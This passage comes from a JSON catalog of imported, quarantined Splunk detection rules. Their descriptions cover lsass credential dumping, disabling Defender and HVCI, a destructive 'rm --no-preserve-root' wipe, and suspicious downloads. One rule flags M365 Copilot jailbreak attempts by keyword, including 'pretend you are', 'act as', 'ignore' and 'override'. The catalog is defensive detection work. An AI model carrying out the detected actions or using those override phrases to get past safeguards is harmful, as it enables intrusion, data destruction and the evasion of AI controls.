If confirmed malicious, this could lead to denial of service for legitimate users, aiding the attacker in maintaining control or covering their tracks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-disabled-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0359e05-c87b-4354-83d8-aee0d890243f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_disabled_via_net.yml" } }, { "id": "splunk-security-content-b04be6e5-2002-4349-8742-52285635b8f5", "type": "detection", "name": "Ivanti VTM New Account Creation", "description": "This analytic detects potential exploitation of the Ivanti Virtual Traffic Manager (vTM) authentication bypass vulnerability (CVE-2024-7593) to create new administrator accounts. The vulnerability allows unauthenticated remote attackers to bypass authentication on the admin panel and create new admin users. 
This detection looks for suspicious new account creation events in the Ivanti vTM audit logs that lack expected authentication details, which may indicate exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-vtm-new-account-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b04be6e5-2002-4349-8742-52285635b8f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ivanti_vtm_new_account_creation.yml" } }, { "id": "splunk-security-content-b05a4f25-e07d-436f-ab03-f954afa922c0", "type": "detection", "name": "M365 Copilot Jailbreak Attempts", "description": "Detects M365 Copilot jailbreak attempts through prompt injection techniques including rule manipulation, system bypass commands, and AI impersonation requests that attempt to circumvent built-in safety controls. The detection searches exported eDiscovery prompt logs for jailbreak keywords like \"pretend you are,\" \"act as,\" \"rules=,\" \"ignore,\" \"bypass,\" and \"override\" in the Subject_Title field, assigning severity scores based on the manipulation type (score of 4 for amoral impersonation or explicit rule injection, score of 3 for entity roleplay or bypass commands). 
Prompts with a jailbreak score of 2 or higher are flagged, prioritizing the most severe attempts to override AI safety mechanisms through direct instruction injection or unauthorized persona adoption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-jailbreak-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b05a4f25-e07d-436f-ab03-f954afa922c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_jailbreak_attempts.yml" } }, { "id": "splunk-security-content-b061dfcc-f0aa-42cc-a6d4-a87f172acb79", "type": "detection", "name": "Windows Impair Defenses Disable HVCI", "description": "The following analytic detects the disabling of Hypervisor-protected Code Integrity (HVCI) by monitoring changes in the Windows registry. It leverages data from the Endpoint datamodel, specifically focusing on registry paths and values related to HVCI settings. This activity is significant because HVCI helps protect the kernel and system processes from tampering by malicious code. 
If confirmed malicious, disabling HVCI could allow attackers to execute unsigned kernel-mode code, potentially leading to kernel-level rootkits or other severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-hvci.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b061dfcc-f0aa-42cc-a6d4-a87f172acb79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_hvci.yml" } }, { "id": "splunk-security-content-b06a555e-dce0-417d-a2eb-28a5d8d66ef7", "type": "detection", "name": "Execution of File with Multiple Extensions", "description": "The following analytic detects the execution of files with multiple extensions, such as \".doc.exe\" or \".pdf.exe\". This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where the file name contains double extensions. This activity is significant because attackers often use double extensions to disguise malicious executables as benign documents, increasing the likelihood of user execution. 
If confirmed malicious, this technique can lead to unauthorized code execution, potentially compromising the endpoint and allowing further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/execution-of-file-with-multiple-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b06a555e-dce0-417d-a2eb-28a5d8d66ef7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/execution_of_file_with_multiple_extensions.yml" } }, { "id": "splunk-security-content-b08e69d4-b42d-494c-bd30-abaaa3571ba4", "type": "detection", "name": "Cisco Secure Firewall - Bits Network Activity", "description": "The following analytic detects the use of the Background Intelligent Transfer Service (BITS) client application in allowed outbound connections. It leverages logs from Cisco Secure Firewall Threat Defense devices and identifies instances where BITS is used to initiate downloads from non-standard or unexpected domains. While BITS is a legitimate Windows service used for downloading updates, it is also commonly abused by adversaries to stealthily retrieve payloads or tools. This analytic filters out known Microsoft Edge update URLs and focuses on connections that may indicate suspicious or unauthorized file transfers. 
If confirmed malicious, this could represent a command and control (C2) channel or a download of malware or tooling as part of an attack chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-bits-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b08e69d4-b42d-494c-bd30-abaaa3571ba4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___bits_network_activity.yml" } }, { "id": "splunk-security-content-b0a078e4-2601-11ec-9aec-acde48001122", "type": "detection", "name": "Process Writing DynamicWrapperX", "description": "The following analytic detects a process writing the dynwrapx.dll file to disk and registering it in the registry. It leverages data from the Endpoint datamodel, specifically monitoring process and filesystem events. This activity is significant because DynamicWrapperX is an ActiveX component often used in scripts to call Windows API functions, and its presence in non-standard locations is highly suspicious. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment. 
Immediate investigation of parallel processes and registry modifications is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1559.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-writing-dynamicwrapperx.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0a078e4-2601-11ec-9aec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_writing_dynamicwrapperx.yml" } }, { "id": "splunk-security-content-b0b34e2c-90de-11ec-baeb-acde48001122", "type": "detection", "name": "Disabled Kerberos Pre-Authentication Discovery With PowerView", "description": "The following analytic detects the execution of the `Get-DomainUser` commandlet with the `-PreauthNotRequired` parameter using PowerShell Script Block Logging (EventCode=4104). This command is part of PowerView, a tool used for enumerating Windows Active Directory networks. Identifying domain accounts with Kerberos Pre-Authentication disabled is significant because adversaries can leverage this information to attempt offline password cracking. 
If confirmed malicious, this activity could lead to unauthorized access to domain accounts, potentially compromising sensitive information and escalating privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabled-kerberos-pre-authentication-discovery-with-powerview.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0b34e2c-90de-11ec-baeb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabled_kerberos_pre_authentication_discovery_with_powerview.yml" } }, { "id": "splunk-security-content-b0b6fd2c-8953-4d1b-8f7b-56075ea6ab3e", "type": "detection", "name": "Windows User Deletion Via Net", "description": "The following analytic detects the use of net.exe or net1.exe command-line to delete a user account on a system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line execution logs. This activity is significant as it may indicate an attempt to impair user accounts or cover tracks during lateral movement. 
If confirmed malicious, this could lead to unauthorized access removal, disruption of legitimate user activities, or concealment of adversarial actions, complicating incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-deletion-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0b6fd2c-8953-4d1b-8f7b-56075ea6ab3e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_deletion_via_net.yml" } }, { "id": "splunk-security-content-b0c21379-f4ba-4bac-a958-897e260f964a", "type": "detection", "name": "Zscaler Potentially Abused File Download", "description": "The following analytic identifies the download of potentially malicious file types, such as .scr, .dll, .bat, and .lnk, within a network. It leverages web proxy logs from Zscaler, focusing on blocked actions and analyzing fields like deviceowner, user, urlcategory, url, dest, and filename. This activity is significant as these file types are often used to spread malware, posing a threat to network security. 
If confirmed malicious, this activity could lead to malware execution, data compromise, or further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-potentially-abused-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0c21379-f4ba-4bac-a958-897e260f964a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_potentially_abused_file_download.yml" } }, { "id": "splunk-security-content-b0c64d6e-cfdf-441a-b6ce-d956e202563e", "type": "detection", "name": "ESXi User Granted Admin Role", "description": "This detection identifies when a user is granted the Administrator role on an ESXi host. Assigning elevated privileges is a critical action that can indicate potential malicious behavior if performed unexpectedly. 
Adversaries who gain access may use this to escalate privileges, maintain persistence, or disable security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-user-granted-admin-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0c64d6e-cfdf-441a-b6ce-d956e202563e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_user_granted_admin_role.yml" } }, { "id": "splunk-security-content-b0cc6fa8-39b1-49ac-a4fe-f2f2a668e06c", "type": "detection", "name": "O365 SharePoint Allowed Domains Policy Changed", "description": "The following analytic identifies when the allowed domain settings for O365 SharePoint have been changed. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations may also need access to OneDrive/SharePoint resources. 
These changes should be monitored by security teams as they could potentially lead to unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-sharepoint-allowed-domains-policy-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0cc6fa8-39b1-49ac-a4fe-f2f2a668e06c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_sharepoint_allowed_domains_policy_changed.yml" } }, { "id": "splunk-security-content-b0ce5521-2533-4f24-b8d5-c2ff977aae08", "type": "detection", "name": "Cisco SNMP Community String Configuration Changes", "description": "This analytic detects changes to SNMP community strings on Cisco devices, which could indicate an attacker establishing persistence or attempting to extract credentials. After gaining initial access to network devices, threat actors like Static Tundra often modify SNMP configurations to enable unauthorized monitoring and data collection. This detection specifically looks for the configuration of SNMP community strings with read-write (rw) or read-only (ro) permissions, as well as the configuration of SNMP hosts that may be used to exfiltrate data. 
These activities are particularly concerning as they may represent attempts to establish persistent access or extract sensitive information from compromised devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1040", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-snmp-community-string-configuration-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0ce5521-2533-4f24-b8d5-c2ff977aae08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_snmp_community_string_configuration_changes.yml" } }, { "id": "splunk-security-content-b0fd38c7-f71a-43a2-870e-f3ca06bcdd99", "type": "detection", "name": "Windows HTTP Network Communication From MSIExec", "description": "The following analytic detects MSIExec making network connections over ports 443 or 80. This behavior is identified by correlating process creation events from Endpoint Detection and Response (EDR) agents with network traffic logs. Typically, MSIExec does not perform network communication to the internet, making this activity unusual and potentially indicative of malicious behavior. 
If confirmed malicious, an attacker could be using MSIExec to download or communicate with external servers, potentially leading to data exfiltration, command and control (C2) communication, or further malware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-http-network-communication-from-msiexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0fd38c7-f71a-43a2-870e-f3ca06bcdd99", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_http_network_communication_from_msiexec.yml" } }, { "id": "splunk-security-content-b11bb510-97e1-4b7a-b673-887ab228c280", "type": "detection", "name": "Windows Set Network Profile Category to Private via Registry", "description": "The following analytic detects attempts to modify the Windows Registry to change a network profile's category to \"Private\", which may indicate an adversary is preparing the environment for lateral movement or reducing firewall restrictions. Specifically, this activity involves changes to the Category value within the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{GUID} registry path. A value of 1 corresponds to a private network profile, which typically enables less restrictive firewall policies. 
While this action can occur during legitimate network configuration, it may also be a sign of malicious behavior when combined with other indicators such as suspicious account activity, unexpected administrative privilege usage, or execution of unsigned binaries. Monitoring for this registry modification\u2014especially outside standard IT processes or correlated with persistence mechanisms\u2014can help identify stealthy post-exploitation activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-set-network-profile-category-to-private-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b11bb510-97e1-4b7a-b673-887ab228c280", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_set_network_profile_category_to_private_via_registry.yml" } }, { "id": "splunk-security-content-b11d3979-b2f7-411b-bb1a-bd00e642173b", "type": "detection", "name": "Linux Data Destruction Command", "description": "The following analytic detects the execution of a Unix shell command designed to wipe root directories on a Linux host. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on the 'rm' command with force recursive deletion and the '--no-preserve-root' option. This activity is significant as it indicates potential data destruction attempts, often associated with malware like Awfulshred. 
If confirmed malicious, this behavior could lead to severe data loss, system instability, and compromised integrity of the affected Linux host. Immediate investigation and response are crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-data-destruction-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b11d3979-b2f7-411b-bb1a-bd00e642173b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_data_destruction_command.yml" } }, { "id": "splunk-security-content-b188d11a-eba7-419d-b8b6-cc265b4f2c4f", "type": "detection", "name": "Windows Delete or Modify System Firewall", "description": "The following analytic identifies 'netsh' processes that delete or modify firewall configurations. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing specific keywords. This activity is significant because it can indicate malware, such as NJRAT, attempting to alter firewall settings to evade detection or remove traces. 
If confirmed malicious, this behavior could allow an attacker to disable security measures, facilitating further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-delete-or-modify-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b188d11a-eba7-419d-b8b6-cc265b4f2c4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_delete_or_modify_system_firewall.yml" } }, { "id": "splunk-security-content-b1a82fc8-8a9f-4344-9ec2-bde5c5331b57", "type": "detection", "name": "Detect Distributed Password Spray Attempts", "description": "This analytic employs the 3-sigma approach to identify distributed password spray attacks. A distributed password spray attack is a type of brute force attack where the attacker attempts a few common passwords against many different accounts, connecting from multiple IP addresses to avoid detection. 
By utilizing the Authentication Data Model, this detection is effective for all CIM-mapped authentication events, providing comprehensive coverage and enhancing security against these attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-distributed-password-spray-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1a82fc8-8a9f-4344-9ec2-bde5c5331b57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_distributed_password_spray_attempts.yml" } }, { "id": "splunk-security-content-b1a8ce04-04c2-11ec-bea7-acde48001122", "type": "detection", "name": "Domain Account Discovery with Dsquery", "description": "The following analytic identifies the execution of `dsquery.exe` with command-line arguments used to discover domain users. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to map out domain users, which is a common precursor to further attacks. 
If confirmed malicious, this behavior could allow attackers to gain insights into user accounts, facilitating subsequent actions like privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-account-discovery-with-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1a8ce04-04c2-11ec-bea7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_account_discovery_with_dsquery.yml" } }, { "id": "splunk-security-content-b1b1e316-accc-11eb-a9b4-acde48001122", "type": "detection", "name": "ICACLS Grant Command", "description": "The following analytic detects the use of the ICACLS command to grant\nadditional access permissions to files or directories. It leverages data from Endpoint\nDetection and Response (EDR) agents, focusing on specific process names and command-line\narguments. This activity is significant because it is commonly used by Advanced\nPersistent Threats (APTs) and coinminer scripts to evade detection and maintain\ncontrol over compromised systems. 
If confirmed malicious, this behavior could allow\nattackers to manipulate file permissions, potentially leading to unauthorized access,\ndata exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/icacls-grant-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1b1e316-accc-11eb-a9b4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/icacls_grant_command.yml" } }, { "id": "splunk-security-content-b1ce9a72-73cf-11ec-981b-acde48001122", "type": "detection", "name": "Windows Non-System Account Targeting Lsass", "description": "The following analytic identifies non-SYSTEM accounts requesting access to lsass.exe. This detection leverages Sysmon EventCode 10 logs to monitor access attempts to the Local Security Authority Subsystem Service (lsass.exe) by non-SYSTEM users. This activity is significant as it may indicate credential dumping attempts or unauthorized access to sensitive credentials. If confirmed malicious, an attacker could potentially extract credentials from memory, leading to privilege escalation or lateral movement within the network. 
Immediate investigation is required to determine the legitimacy of the access request and to mitigate any potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-non-system-account-targeting-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1ce9a72-73cf-11ec-981b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_non_system_account_targeting_lsass.yml" } }, { "id": "splunk-security-content-b1ea79da-719c-437c-acaf-5c93f838f425", "type": "detection", "name": "Windows DNS Query Request To TinyUrl", "description": "The following analytic detects a process located in a potentially suspicious location making DNS queries to known URL shortening services, specifically tinyurl.\nURL shorteners are frequently used by threat actors to obfuscate malicious destinations, including phishing pages, malware distribution sites, or command-and-control (C2) endpoints.\nWhile tinyurl.com is a legitimate service, its use in enterprise environments\u2014particularly by non-browser processes or scripts\u2014should be considered suspicious, especially if correlated with subsequent outbound connections, file downloads, process file path or credential prompts. 
Analysts should investigate the source process, execution context, and destination domain to determine intent and risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dns-query-request-to-tinyurl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b1ea79da-719c-437c-acaf-5c93f838f425", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dns_query_request_to_tinyurl.yml" } }, { "id": "splunk-security-content-b2215bfb-6171-4137-af17-1a02fdd8d043", "type": "detection", "name": "Windows Impair Defense Disable Defender Protocol Recognition", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender protocol recognition feature. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"DisableProtocolRecognition\" setting. This activity is significant because disabling protocol recognition can hinder Windows Defender's ability to detect and respond to malware or suspicious software. 
If confirmed malicious, this action could allow an attacker to bypass antivirus defenses, facilitating further malicious activities such as data exfiltration or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-defender-protocol-recognition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2215bfb-6171-4137-af17-1a02fdd8d043", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_defender_protocol_recognition.yml" } }, { "id": "splunk-security-content-b2442e49-bd3f-4685-a2dc-2bdc292563bf", "type": "detection", "name": "Windows MpCmdRun RemoveDefinitions Execution", "description": "This detection identifies the execution of MpCmdRun.exe with the \"-RemoveDefinitions\" argument, which is used to remove definitions from the Windows Malware Protection Engine.\nThis behavior can be significant as it might indicate potential malware activity or attempts to bypass security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mpcmdrun-removedefinitions-execution.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b2442e49-bd3f-4685-a2dc-2bdc292563bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mpcmdrun_removedefinitions_execution.yml" } }, { "id": "splunk-security-content-b25f6f62-0712-43c1-b203-083231ffd97d", "type": "detection", "name": "Detect New Local Admin account", "description": "The following analytic detects the creation of new accounts elevated to local administrators. It uses Windows event logs, specifically EventCode 4720 (user account creation) and EventCode 4732 (user added to Administrators group). This activity is significant as it indicates potential unauthorized privilege escalation, which is critical for SOC monitoring. If confirmed malicious, this could allow attackers to gain administrative access, leading to unauthorized data access, system modifications, and disruption of services. 
